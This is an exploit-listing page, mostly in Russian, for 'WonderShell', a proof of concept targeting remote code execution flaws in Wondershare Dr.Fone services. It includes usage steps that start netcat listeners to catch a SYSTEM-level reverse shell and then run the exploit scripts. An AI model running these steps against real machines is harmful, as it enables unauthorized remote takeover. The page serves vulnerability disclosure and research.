Sploitus

Exploit for WonderShell

kitploit · 2026-09-03

Exploit Code

MARKDOWN41 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-NETANELC305-WONDERSHELL
# WonderShell - CVE - 2021-44595 | CVE - 2021-44596

## Обнаружено

Нетанель Коэн и Томер Пелед, исследователи безопасности из BugSec.

## Описание

Пример PoC для эксплуатации Wondershare Dr.Fone.  
Dr.Fone — это телефонный набор инструментов, разработанный Wondershare и уязвимый к RCE.  
Только имея сетевой доступ, мы можем выполнить удалённый код от имени пользователя SYSTEM.

Уязвимые службы:

> InstallAssistService.exe  
>  ElevationService.exe

Протестировано на версиях: 12.0.7, 11.4

## Использование

Измените IP-адрес и порт и выполните.

root@kitploit:~
    
    
    stty raw -echo; (stty size; cat) | nc -lvnp 1338
    ./ElevationServiceRCE.py
    

root@kitploit:~
    
    
    nc -lvnp 1337
    ./InstallAssistServiceRCE.py
    

## Публикации

https://medium.com/@tomerp_77017/wondershell-a82372914f26